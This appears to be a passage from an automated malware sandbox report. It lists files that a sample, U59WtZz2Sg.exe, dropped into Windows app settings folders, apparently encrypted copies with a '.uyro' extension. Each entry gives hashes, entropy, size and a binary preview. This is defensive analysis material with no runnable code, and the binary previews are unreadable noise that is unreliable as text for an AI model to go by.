Preview:	regf.m.N..0Ip..I\...n:.NU..f.K.;.3'.*..6.....}.ZT..;....@7..O.V.}.6..4..9..Tq..h...Ku.....YsN#s6z\|....k..10K......21E-N.ar.%..g...x.Q..G..oE_...XQJ.8.r..8...Y...a.5.L..].T.5..H..@/kB.O...a.<].......T...-..2..v.(\|v..........\..^..5r_{..BF7..x>5_..K..@.r.......2...\.W>.1....JQ_..7.b,.b-........B..DCRNym....Q>.@..(.....B.i.~.p=&..n..=y.).Z.v...#>..EO......SU...Z.<U..R...a....v....?z..#A.L.Qw......y4.D.......>F..T..)..M..........p:ZV..(.Zj]...z.\.j`...I.r.O..L/.....&..A:.....Bv....n..B.m9.{...\|../.X...R.#....]g..I^.K..7?..4.a..d.....[.^..\|.P9...W.U.^.,[p.l..#.....u..U.S..%.o:..g?...T..1T..S{......E].?m.`(]/i..T..L.a...Vm[U.tI..J(..z5...zB..ix.\..S..6..F.F...A20>.a.<!......S.RWQ.A..[B.....s...2...L..5....$.,...F.{...5C....]&.....gS.+.Mn...".......-.\...:./..o.=.t.%.7)..... .."UWS...i.....:....W..1.!..o3.Qp.B.w.P..7..C....c0.S.s.(..>.m.Ii..R..U.YW.@;.G;.m..).?.#%.._..R.x..Z&. Y...:....L!..,.S~../...-..R.K.....2.."..<.",o.xQ.,.kO.l>.X...iC..q.,.

C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979014648493388
Encrypted:	false
SSDEEP:	192:AC3eSvQEhAS/mOduEYEbsSGNOu7oKRVHuZHJ:ACuSvQEN/rZYEJGMuMMOZHJ
MD5:	2F1BCE1A1FAEF55F6AB3A0414E62B406
SHA1:	2D99C954D9ECC1D9C42174C694FE6183E5CC9C32
SHA-256:	B589FE8139EC5B546DB5EEBF1D89F9F08111C26EFFEA608FC341CF930DBB7E8C
SHA-512:	B7FE3942A16CCC6E77EF764DFFFC83569D5592AED30E35225A3D40714DF7B441CB35477A12D8BFDA12B67E14DFC35139BC0E82AB2C4992917BC399164C48F4CA
Malicious:	false
Reputation:	unknown
Preview:	regf....).1.[....A7....E!...2Z..<}..uv....v.0.M.R.KW.g@ja~..Y=..^.........O.).v......Zh.}sS.....`.&q,..`.P"....f.(Cr.~..q'.i.!-....='.4s.SI..5\|ip.mjB...)I.f.zUA.P.........sQ.....O/{#.\....p..h#.1..`.R.<..<.&u......k.N..)..6.g....~.@..GV[.&.9..DK.v#.B.Q.`g.e..y..%..69}....eY.F.Q7.........h.?:1....c<a.....=.....5:....[...:.!.;....].....h3.8.@E.[\T./.T...J..!.O.E..wD.G.......)6.F.....RQ...5....._..&..53J......b..w....N\|'....A..m......L...p._.m?....q(.2.J.j!g....C.X..r..o.....I.=."...3.j....F\|.2h...._....t.&wt.].c.....,.dh.5...].+B..E...0.......7I.w3......(._.]:.-.c.L.%......_.].6WV...S.W..&'4[.b...f}....V.;...._.0.....C.`..Xz}.q_5.&.......oW...........".zQ.z...<.1...neQ..;.:..K.)...gn......'..:..5..bPZ.5.C.. E..........f<.2.e..2...p.X.Q.....[....>....D+.W.....P...)...<.....dn,.j....U.,..zq()5..x...E......A...2..x~.U1.*U..~......4o.>..U......b..Gg4#!.%C....l.....-p....zPj..=.<..Ye.S...0.....j..{.~. .WPZ. f._!gl.=.X.g.3.f..V........?

C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.977280986032397
Encrypted:	false
SSDEEP:	192:fM98ar4RnP5cUk3QyNWhmR9YiAJvLpKVoq9sVr0w/sSfGfIq:f6zsXcUkAyNlYqP6YMq
MD5:	BCD9931CBB97AD5A813799B06C225AF0
SHA1:	12B88F2977C74D7C1646A65BA7EF5D94CB99830B
SHA-256:	C3ADE9E2D4F28CFE2C14257345844524AEE283018A2D5A8074AFD4003CC7AD0E
SHA-512:	5078F97C5BA4B1AFC8624ED2605CD96D42F5279598D0C9CBE27C88722A25ABE4A5B98D6108752C8EDED2A45D4A3BE0C667492F2FC7845D22FE24F4C50A237399
Malicious:	false
Reputation:	unknown
Preview:	regf.....GE(u...Y.L.<.z.@..' ..t.....?:.];.t...../T..J....Ve.Z..~....UU.DC2L.u'2.{W&....:....6....%Y?S..).<...l^[r......E.."Q...BP-5K.i.D....E.\.......\|.+..!>.Z...r..rW.=u 6.%...MF@...&.d....HI.,.V.Q.f.n0.S..e..v.LO1..%K.&.T...w..^..f.;.<..7.J.1.l....E.AJI........N,l..aJ.n....fI..l.O.=....)._..}.q.....5..?.A.H..B.v.....^6..0.5!...g..v....H\|.Yk-c...hF..M.gB?...b._q.;Nr......2.w......[..hlum....UF2.]..t.3%p.5....3\|..G.V.s\|T.J.Ao......ryh.m.Y/.../.&.8EAw=...0;x...X>.....F}.33.-.T..^.[.Z.^....\|g.(LB,.A1..9kf..;...P.....Rd..E......B.....O1..K.b.I..A\|..S.GZ.M..;.m..y.K............u...s.Q..Yc....v..b..\:.#./....$.X...R....h..0$l~.i.2..,..qd4...t.b{o.,.EN!)..........@..`.]v...>.Z...G.......Vpb.....*Q!..P...-.?=.3_...c....E....n..Z.........4H.`N4....2.ve...%.t...O...9....\|.8T..K&.8..E.x.lq,...h<.Q.1DY.............,"..dH....[.:X....`.7.>./~b...rHB.!..}..R].y.N..&......d.. @.Zs....U...x....r9,..'.. .....el...z..b\...b.l.........4.m....L..Cj4.f...

C:\Users\user\Local Settings\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.974562152211873
Encrypted:	false
SSDEEP:	192:m3M2GCU2p9SY4DnB3+3yIZE0UDNkGiXir23Xpg:mcCpNgB3PcmNkGioY5g
MD5:	525BB2FB596A1E7A5EEEDD418599ACC2
SHA1:	4345A092A257192B54AE5E362BF83FE098119A0B
SHA-256:	B1CDBCA78B1EA3CBC6B95DB40AD2D2E228E636B0039DD63011AFF74B3CF6F522
SHA-512:	D62B25436EE00E967D0EF1C06ADFE5A58D1B9AAD01D1257F9CF55ACF9D2D1022C37DE71365FD29A84050FD78A9FE5E93038008543180CA2AA81B30399EEC5560
Malicious:	false
Reputation:	unknown
Preview:	regf.9}Q.8......9..m.........hVwVX~.t....aP.....Y....../=/...a.../..@..Z.$.u)Sx...CZI..../zV7.fC.m.1......3...MO...~..?\|S...E......!..p.2..QlB../...hZT.D.......7\...# ......j...O;.vy7".0.om.._.....%.d........QIq.......2..:..s..]k.w...{41,m....Y.........k..Y.....o.y......n0B.!......'.....zz:.j.6p...4Z...P.j$L....P8.x...3'.L.z.....87h.........F.n.*..~.....ue.3h#cq..:..`.1(.\..C.)..h_...{LZ...h...TH.Vv--,..u.nQbxZ..L{...{..o....A..t.........>1..p.?.....h...#...{...z$.{.....#"..p.r6~.4u.<.S)...I..2=Z.....\|CV..r........%L.H@z....wlJ}.......E....,........o2....(.7...E.Mj...Ef.[9.S.\.#..9N..1F..:.zX....,...T...x3....F.nqrf......p.x.X....C..o....kn.G..I.F.=z@...."....@[m.......4tw....`..yn(..u@!...jW..}.z$...7.i.A.O..........B;.V....i.......@....F......Z...?<......).....->a...L... ...%..\.....y...;..^..%.ATnC;....-...;...Hf.dG..pD:4W..-...N.V5....m...rLJ.q...\..@....m....../=...L+.+....!.O.e:B...,+ ...p..\|...w..a..o.Kf.6,.kU..P.2.......?...h.

C:\Users\user\Local Settings\Packages\Microsoft.Office.OneNote_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.98009731776558
Encrypted:	false
SSDEEP:	192:ndkiJ92KseoGgc6AymdQU8vjf32mIFiicQGC5ogZdE:nGiJ92N7GgBAyJUBj8iLl5oWdE
MD5:	A814247EBA71EA4D82E0A64CC8C2AE89
SHA1:	7BDF818899D95E3E73F1BB982737A3B091D8681E
SHA-256:	9F3D6F66D9309E6883B60CB98E3B5919842272C6233CE252196347DF2091557F
SHA-512:	1960C66E9411E2AF2DFA22F2E5C75FD3566ED74030C6EC7F349A05A0137B6A18D8986D7113DC7805727A24988BC95D58F712FABA59687A9BD58F70CAB62998BC
Malicious:	false
Reputation:	unknown
Preview:	regf..a.5.W[@C.U.D.3pIK...@..........;..So.o.w./.b$....s.$<.5...Gg.-..%.l.'......%..V.l...j..O..........u.g2P\6c...M..U..>..vK..b..H&!.w7....kr.Q..f0.....u....v.Z..E9Z..V..8..w..2^.,..+2.y.s......"\|G.K.....`x..c4l..u.F.kU.%..U....UV.U....Q..J9.n. -0E.....'@...).c..t.#E...B....2[2........^...^..).V..{y.2.f.X...1e.I.}.:..#..-...#...xd.Ue.w..."..^:...4..O@..V...u<.....=dV.B...`.:wI.U.u..ZW&.q..Z.b....E[ .Q.N..6aC.......vx.2.u]...B....?......~I....M..mJ..M@.......m.35...9...;c........gn..T..I.o.(.......g.2I.....#.%=.P../.....[.H....n.....Fx...!,........m...7....$.....XJ. F.'......L..?< xZ.3i4.zr...`.u.....JPd6=.......:^...nB..1.e$e/..F{1..D..RV..:.....=ER@h..D}..A......r..)...V.....=...nC....w....`A..q..S..TV..A.....z...3h.j.%....T....&..?.;.t..P.......~..].i......rT..R.........a....?.......s......K.>..8C...^..(.........'.`..M/..<..h.......:5.J......#..W......q.^R...i......\...`mJ.y...L..q........P.XL8..M...9.x.dX...s0.m.b5....;"..<.

C:\Users\user\Local Settings\Packages\Microsoft.OneConnect_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.983151031699798
Encrypted:	false
SSDEEP:	192:FS4Sy9pl51Ik+IihlAvG5uy9NKrUFzJZ5NDhXmqXUZHt/:R9pz1IkShEGkpUFzJOzZ
MD5:	F2D430D93975727E88D68D19520CCB9F
SHA1:	B78ECF4EFB2A0D4ED9891C0692354E6E765EEE0D
SHA-256:	C296F66277DE7FA2E70F25AFD7D91052AE84B26AEFF49442EAD3DACC91F740B2
SHA-512:	EC69C42C433B13F93F67DD3639191BF0E46A771DBF38DE77F3E78D2BFD15EA928A511CCDC8D8C16B2E99F5A8D895502ACA321E586741C8A39BD6598D32E3F0A5
Malicious:	false
Reputation:	unknown
Preview:	regf.y.Y.f^...r.w.nW0...sQ.....3.y.c.....s...^@v...s............>%.......7g...m8!3....kf.jI.O...:}......$....z}'....+.U?.~..K[k\|..[..R....mFNt. .2w$..]9.......r./..zuM........H....P.fr.....ZD\.....T.g.8,{.a......I@0..`.....4 ...1."....@..\....w;=.(.......3......D...Y.w...@.B...Tz..[..q!.]..R.KB}R2av...t.`...i......._./\|.Q...o.....Gvr!.......W.@uD..FU..%.x<.D1g..=.....B6..u..7{.)\.E...,T......"._n.V.ZP...J.q.B...;.C................P.u.'j.q.x...`&...g....K]y...s..qRz..........y.`..=..`.yg.T.j.CK.....=.?..?.W.u..5...y..`..E.!..D........YK..A...\.,K.T..#.Y.. .>....N..m.Q~..}......_.h.P).,O..E..'..._....T.vqpQN=Y.t..XO.c.AIAo.N3l.._(.(L........Z........oe.7....d.D..xK.eI\|XHH.Tb..q..WH.k.Gt..y....r...m\.A.....#..@.)...%D.Dl.:.IR&.vG.\|.PY.\...Yg...U{a..fV.Nv..6.......vm.A..g.Ac'..4.Q.V....ir\.....W.d...UL8../../H...9R...,)...S-.<......K...9..Q\..#L.0.;....\|..X..w.b/.K....m?..XL.{......_..............O...n....J.....\|o...[/........@Y...:).MK.3..

C:\Users\user\Local Settings\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.9771125920787815
Encrypted:	false
SSDEEP:	192:RMEP3iDPgX3pWJ7PitaoILXDwN6u5BY2WL1X/xPeSLELEAUEpW:RBiPE5WhIa1XDwP5BkL1X//GhpW
MD5:	A546547AF442ED638F1B4C98F8AF2137
SHA1:	2E246AAB9A28CF3070F5384BB699A68856FB7E02
SHA-256:	0A0A300CD02011F3BC8960B38DD174C094D62809511AE8E7EB7ABF0DC3F58C96
SHA-512:	3DE9272E657C821E7108F6452B24EDCEB2987D1EB86BFA97E314BFF3C0C75939C8E687B5787E7A7C5403837FAC05E9D9DFF47CF2BEC25479B68B2D9302335CEA
Malicious:	false
Reputation:	unknown
Preview:	regf......U....'_L..8T..U..I..J....S.:B(/...?\|..VW...W7...!.S.?-....$'....B...#....w.p....Q..1.Qi.@G.0./:-....Z...."..x;MAr...7%k.......p..z$W"y...fm...D.z.:...$..L....f.f..o=.,.(..Hyp>.Up...q...8...q.J~B../.....V...Wi...a......F....=.......g.$.u..`..._..B"...L>b.B..k..{A..+X.])......[ .1..R.-. +J..X.Tkzq..Oh.h....g!.....$P.tKHC#...r.tO.%s^1-..7.....0l...x..:K.:..n+.Q...........]G..O.:..C..DD..H.Z..6.$.i........'.2j....);eA.N.k..u.4.#.....Y...G$..y.J9..;..g.{..8E......%!Nt....[...^6...>f.l..MN3....&......B.......D...r.68g..,....5".0.K..h........ =A.fY.......L,W$..D.....zS..Z.j...nmW...........>..~m.[.F...............}.......u.P:.OD.&..s.]v._c....Jaa..@.>.....\|...Gy6..{....\..,m...[.q...YP8...jaJ:.T.S.}.:.]0.U.G..H.N.y-R:R).....!....a."3.9V.d...<N..ANg.).r@.\|wn.7.AX.p...(A..E$4.....!.}#.k....jx..t..&_`..m....F..k........;...G......9...v....C.N..1."*@...]..l......u.d.u.w..N.9....1..NX.{....,.....,.......)\|...+.\.6..%.O...v./.

C:\Users\user\Local Settings\Packages\Microsoft.People_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.975966295951921
Encrypted:	false
SSDEEP:	192:q+BcB+vE5H9WyinxkXGfjfoXXPZcIt6zBRqHzQaexzNCNJ7twO:qkcMvEeyixXf7oXf+zvczQDzAxl
MD5:	F6D2FDE4C6F1402319ED4BD38EFC9718
SHA1:	F391D71C33ACEDC78231A387B3EC8513E426BC6E
SHA-256:	60FEDE073850C2494785752EFA060F71DBF05369F6E1A10A792CB3CA8CAA026F
SHA-512:	233A59231880C843A6F5ED33A0C4A9C3CBC3F0851F04259597D08295840A479BC7D9BF6D3DF9E91E2F1C7D3ABBAF4C83301A92D33A5FCB7BD036B78A3485D58D
Malicious:	false
Reputation:	unknown
Preview:	regf..7bx..#T(..5.)F...UJ......h.....[....].t?Wf../<R.v.......P..^.]M...`.....mt.2.[..A..l..;0?..4..F."......C&J...O.._.E...d..E..T..A....'...&.........cY...l.w$!s...L(.e...@A.....4...L..+..w.......<J..eC.B..R.^..d.O...Q2.e..{@kV_^i.A..9.".Q.. .f_.A.....g!.9.~...a..y.n.........1k>Q<..-.a....C.i.B.B...^..B[.......4f1.H.A...QQ.....kHF.M,^...1.-&......K.^B..K...V.../I.g....F..A..J..;.....)i.+...'.%FUD.Z...Wq..o.....zR.GX.D.j\%m.=c.....=3.,..r..-.........f1..4..0G.!..ye...{...?B...gE.H.....:[...-'....j.UH....@..n;!.......s.G...........=?....#..]#.(..S/.%.Va-......q.-........;:......d... ..........R....&..o.s.=?.6f....S.b..........B...g..g...,.t.09.<..#.....q..8..#....a.....C..4(Y.3.?.K..=.F.#....N.>x&....@.u..L...BS..].....,.%.dV\|/.:.>0A.....xI...,NJ.....~.~..]U...J.Wr=.oNi...`a..../...6\@..p.,j...kF..e$@... H..6.e1..".f....5y.~.s.......%%...`~d.,..86...u..\|.q.8.aW$.V.i.t.........q...j...W>.cEa.=......}..O....s3.~.Ej..Mf@.GcF.....\

C:\Users\user\Local Settings\Packages\Microsoft.Print3D_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.976487878239003
Encrypted:	false
SSDEEP:	192:E2VHj66QOHRLnigtDvgqyT/LbvJn/JTpGW76OFMbUO:359xL0Xb5NpnJO
MD5:	934F12A90277555AD3ACA5645D5FD534
SHA1:	9CCC60AE621E7DB78D9F91585FE8FF8541A1DA47
SHA-256:	836C8683A9E3DB0A851F873AD4CB827C49C6859E37432BD6C58E7D4BCDF06ADF
SHA-512:	66B0E5073232599D48C8B370288F189AF04390E68BB9A32AE095FFF92B85A487B2A00C7B8D490C19FB073FD0B202C60A5B18DBBDE5C8F1C9A3C40C84B695CC99
Malicious:	false
Reputation:	unknown
Preview:	regf...A&....%..b..&..?x_..8...8..^.jY.5.....4"BJ:.....Rd..:...!..cL...[..p.[E.....\|v{O..^..tt..0#....^7.6....J...o.9..d.......S......V.)........(g.....j...s...L8.....-.9.a.....NO/.}....p@..{..s..c...bG...?L.."..z%......`..5.h+...lP..8..9..MU.r"...tJD.rr.....b.....T.].g.-..k.s\|.(<.Gk......,.....s.[U =......N...%.@.....}......Y..m.g.. ..e.&.e...a6...}U..........Cq.}B'.\..~..B\|..>....N....E....sx.L......^.`....?......Md)..vD\|.%.yw.....'..Q....h...uKt..3...f...T..../.H.I.Y.y.zP...#...b..)F1.k4<<.........QG...'t./q......\.Laj.^..}u7,.3y. ...5..... S...c..O......_.\.wv..%..]....@...7z..R.lJ^..S....>`...G^yl...NB..F[..D.\|....W.&....5g..G.+.x....V)....-..#....~.dE..Sa.P'......r.........^..Tf.{+..=Y..a...@..i[;....^c.\|Q..P)...#.n..`..U...WY..:...HV<].J.}v&..\|(..i.@k..X.L.S.....wjE./%.L..G..H..G..Uv.$A.2D.M....e`m...>...T..!,.<8...0.%\i....]..h5.^...S.\|..b.......v#..p.kc..Uw6=8Y......R?._.].q.!..Nu...J..C.....h.`......R..0.3.xP.v.0x

C:\Users\user\Local Settings\Packages\Microsoft.StorePurchaseApp_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.973999591719097
Encrypted:	false
SSDEEP:	192:TEe1koBzLN31bARgNbdkhjZ9WAEVY5oQifhJso6AtwDIyAmJe34:TOanN3SprWRY55iJJsfl7so
MD5:	C8C54D607943390751FFC5E1B715FFBE
SHA1:	A148A6D161713BF2DEB13E1F11DAEA297380EA85
SHA-256:	0F35A748C33BAFB0994428AE237B2BDFCA5CEE6A445C3892D478D6B3F67876F5
SHA-512:	9E1937CD9D9A79BE1D0AB0818A091CCCB71F095274B8FBCAFCE210E68E19FC5C1AFEF1FF966F10495296D14466029E5AE1BD664D37654CDD4283E9564B1881E2
Malicious:	false
Reputation:	unknown
Preview:	regf...-...2..j. Ta..<..C....+U.k=m..3v.p..K.?m+..].Gi=V...i._).!t.....Ddt.k.1.`.......K49I..[.F...#.+s:.}......r..h.a....H.@.....#_W.(......w..7x.Z.5..W..BjY.....a.W,#.y].%b.NB.~H.p~...'..p.r...#Q.O....<..z.n..U..#.;.3.]..O.u2.b..J.;.P..6.Jg.L.......kI.Y.D..J.j.=i..:s...........eF..zE6!.E.J.h..wr.BN.].S.]...........7P....0.......k...-...MH6.8.....@{4..L\|..m.,.(.....J..m%0%..&..ZpTi.>..~!....w.&P.......$.=.Z....B.}&..#;x..\|..../.'(..=...py...%+?)e>_....)..%...US*T....kk.e\.......^J\..`0L4..K.~....-.8.q....d...Zb....2cK6.'}..+..%..^M.}>.......w.@.>.....&.i.4.....`%...N.Ou..0..X.4...iNM. .\K..{...~.......~.(.L...(q.T.".<..g-..y.O..e9xN....._........3.\|....@...8s....9k.3.\|qW...p..... G@......WDG.1`..C........q.gA.E..A.......W...o.1.y...G@..6.Hz.3`.L.c<.uw..[.I.&..8....Rf.M..@j.. [.k.qMOl...Cs..K..r;.$.+..&.dj.I.jCT/?..'2.!.b.'-........U.1.I.T.......<....dd;......$.:4Aw...E..Z......%...,...../...7.M..,.q.9A.=z..,-D..2.<..O..2....Fl.^...

C:\Users\user\Local Settings\Packages\Microsoft.Wallet_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.978360128052729
Encrypted:	false
SSDEEP:	192:LZXYvdkdP0OVpniSijgmLA313z2FTHVa30vWSp/38ItkYPVDY:iHa/HmLuxA1IUvdPVU
MD5:	E6B58EA47C04AFABBA089AE8A73D697F
SHA1:	0BDEDBD97D3D0C2E86AA0AA1AFAC47850F669D3B
SHA-256:	F0784C7FFF6D6D07E22296CA80102AE41F75E032B3EA219D95D1946D32A11F21
SHA-512:	8D93D867DB8BBFDDF71952D61BFFDC4A3D40B8F68538CD4A670A02A934E5D1EB991497FBB5272D04F898FBEE35FC3D4B25A7F8D803490DEB6F9E874AD43074DD
Malicious:	false
Reputation:	unknown
Preview:	regf.i.Gq.GQ.\|%...W.?...=A...k..L%..B....J\.....n....4....z.".(.u<Etp..m.~....F .3q.h.vg;......}..~(.=L.u..O-........A.o....D.2..G:N...&N.k....."U..a.b.#..O.......>..5MtF..`d.(.p..`..A.>u8..9^<O.^Nz.\t...0t0lEK0...%......\|.{.0.T.!.y.TP..J.o.......^S...C...9.\8..XaxZ.uO.1~.I...#d~t!...=8.....}....E..6=q.=K...5..........?......&.G.K..T.epefgT....'......4e5..."...\,..t.0.X.[r....i./...=qH2.....H..^nqa..RU...........z9)k.{m-..."..3.[..l.2.s.-.....s...F...&d...^)mb...<...N..]....b...u.q.Zk`..P..Zm]..&...k\.. P.8.I/.h.u....y..1....H.....C.+._c....?eg..F...n=...........u;.......~..a...L_..G..H..K/..`gITO.\|.9nU.!.Uc\|.._.O...7.W}..x..`......d.......Q..%..x.4z.kg..d8...WI.&qQk.#...<J.........>]..x....u..8 N..(J\..'g/...0.sc\!..7%...t....E.G........C.....}..N. ..wZ.G.=>b.....si.M..f..B@w....j.G.9...YH]i....C...m..j..X.@.......v-u..F.....%.u.<....M0...}&..=.r5....q....;{...{9...z6...]....z......o..T5..{..8i.%.E.76.].%5.w..T2.u+<^v.P.....v\|).

C:\Users\user\Local Settings\Packages\Microsoft.WebMediaExtensions_8wekyb3d8bbwe\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.980706279280975
Encrypted:	false
SSDEEP:	192:h/mAz4NzFJkiV7QOhgjyfT6+WW4mIoWOYbSQdwOp:pXq7uOhgj8KPoWOMSQdwC
MD5:	20B39F3C4D8D384CFBC4D68A3B95D818
SHA1:	092BEFD550E1D3E9098EF53407C092CEA5F500C8
SHA-256:	C1FA91DCC919870938E27E29DBA4C239FE39396ADA45FA61A6FCA1EBBF83704C
SHA-512:	5AA555A6A3AC406C626C26D6FB24A4D65D0CD4AA72E9D733679315D2491A7CE04B20055C305094F57A78C2C9878A68CC878D733FF9FC60FB12EC0D2F18A34EB5
Malicious:	false
Reputation:	unknown
Preview:	regf....@h.`(......P.&.R..6..td^tZ.....f.?Q.{...<V.=..R..?...s...Z.Znm...].L..G<.A...-..h)S#.W.;?..J.V...\H...<...u.Hf..w.Ql.#s/O...7.b...NcK.....\|....Ml..W...zM.!..........-..b..6..q9.@w...6..........S....ARC.3U. ..........dzy.Uy.5.............H...a.R....%w.z.....3...I..[TT[.{A.........."...j.G.KrxZ.......-.b.7...HW.A.)N.J.....7. RI_....W.~...m...s.X.c..f.by....X)(.i.0..x.M..).'.BP...<6........T.D&...~..j..+r~......jd.\|.V.22MW...M/Z*..#Q......;u.}.w.t.{!v..pp..$.....=.!.:....04.oP...a6.B.~u..1..q=.n.....Y..Uw.A...e......zx..uRP...<JQ..5.r.....B.._TUra.n!..VAqG~.z.V.2.....Q....Z.a.$.q[.....{......:.qF.4F..)).kGI......<...a;.l.Q/...b?Y.}.=Fe`..\|.{.....~x6.d..U7..1.f......S..n.rij.I.8........Z..:..mJ...Wms^rn..?..N.. ..U...#..+.'".1.&dNK..D.J..U....G.>...n.I.l>oMl.{<Vu....?........Z.......ww,.K....i34.......W..............+.....$..\|.^........2...3.7 'z.......by6(..0..D.]......).IK.A.~.#..&...v.$[Q5'......F.!.W..H_.."I6=.....~...^h

C:\Users\user\Local Settings\Packages\Microsoft.Win32WebViewHost_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.979372012982651
Encrypted:	false
SSDEEP:	192:/H1HlKWK1ClCNxlZW1ylVZYjp5wMJu/F9l50V6:/DlMvcg3ZQ3wM4J50E
MD5:	D9700D40C2FF2C83C40A2E2032EF1AB4
SHA1:	F51FEB4ABD664D127DF0580DD4007E7B5416CB38
SHA-256:	B70259C00C42282CD52A58FAFA4D27BADE34756B17B98F92351AAA4A03CB6646
SHA-512:	9EC1BC5DE276F71156D88221E86E0C390F8F472AB995B0F71FE6A78041B6B0BAEE571DCC73BD46CC80047B5FABF2C854D6130B48C6790E5761EE10269EC28BF8
Malicious:	false
Reputation:	unknown
Preview:	regf......g.p'.......(a4O.]7...@...G...y..e..`...W...C.s....Qf.+Z.......l...q[......g.?.rFJ_.......c.....z.X.n..=VH}nN..8..V...E.......<Etl.J....t.......F-. .@..n?..V..5,...3... ~_f.033..H..u.."..m(....1[.+(..p....I...O..X.a...@.7..9.........s.F.8q....B.H$JG.\.=...?..&....Rm.VII..'V.MKW..5f.V.%...2n.!...'.:..d].....Rc..uN.f.0)1.....x....'..?...lh......=...'..!......=al.....O...:Z..(....j..x...!zZK...!...Li...R.'....b.c.m.[.....%..c3....r...%.T.j....U...(......q_.]LV\|27.....\.0. <..9..T.6..(.x.O.....L-]....=z....l<...Q....0....4..m+..hW....-f8..I..`8P..9J.eCj..".Ht...V.....`\....?6....4/....I.E..... ...M0.K8.}k4..._8...-4.!...UCT.......o..HN...o....J-O].`v.g..89.\.....@fk!.O.`.C..d..p8.N..d..y.a..X...M>..f.Bz..w.}.._....w.9...3v.`..+.F....K.8.F.U7..~..N.,^4......L0....Z.TU.&de....#=.+7..&h..l............}.^.0!.1#.A..Ap....... .b.b..V......9exg..)s......q.].<..o>t..#?3l.m>1:h=....\|...@..s..?<.u..-....M.$....k.....o..E!..>b.Uk..E.....rk...Z.

C:\Users\user\Local Settings\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\settings.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	8526
Entropy (8bit):	7.974609101199201
Encrypted:	false
SSDEEP:	192:Rl8Sql/muScVe/KqODrI5C7HtWq/G2jPJm2/P1EFFcbYQvQ:D8xlpSpO/IE7NBbj42/dEP2YQvQ
MD5:	36E8A5185AA3B00746DE1CAD93C6674A
SHA1:	2DB970EB3FDEB9E339E079381A4C10A8FADB5C13
SHA-256:	B219DC1E80439179F8CE58BA86EE1E3908E32C97F21703FE256733DFD48BF52B
SHA-512:	F9BEC2E9F2485BFDDD1EC2DD36E9CA4686A4369028B4C7B40A471CB17FEB482DFA8429A6794CFE6E29AA5B886244241F4411E0B7C1E42A456175C042C5D12164
Malicious:	false
Reputation:	unknown
Preview:	regf.:8....\sp...3...f.'.L.I5.x...'.k.w...%l...."....v5..;+...\|V..M.1Q.xv.... 6..l.....:..E....<.L.......Q%.@zT.U..y....8>2)....&E{x.2r.!L..........{$...p._.K=a..t..m34{..&...L.>..F.5.?...n..G.....s.@.a...y...J..,:.".V ...]g.+......3........P..$y$.7.OLe.6.nLG....i.....{zl.X..@...K.{....'.,yK...3j.8/..........8..Qv...h.kX..3._..H.4Y.:.....]z.7...+G.;V.2x...;...%...@......y9.r..1.z.f.......s..CI.....W..T.....)*._.Nt..2...j+...'Bu#..8'".v"T..-.fP...a...<{....h.....a...j.".[g..@...J..,...Gw....I..k..3..^E.:c...5...L4...E......O....:.J.mvo....f^3..b.D.M.q(<\.z^...%o..J...W.\..?.........{B....UO....q.~.....$...-.w........i.'..P.2:...'....f..2..:..M.....Z.$.V.Qm..DJ...EE.@.n:....[.7J~.zn&l2+R.:..n..........@...]P.F.ran.`m..m%.8...x.[~.s(.].M.)<...U....r$.R.............r..b...R.....o'8..}....^..l.....'.H....i.i.z.%..=F...a;.....W..~.8..T.d...O.7..O(...}....."...A....t...iu.lt...,....(f.u.&..}..8D\|.}N...0...p.oa..H]...)..>.\|...)[E.38=...e.

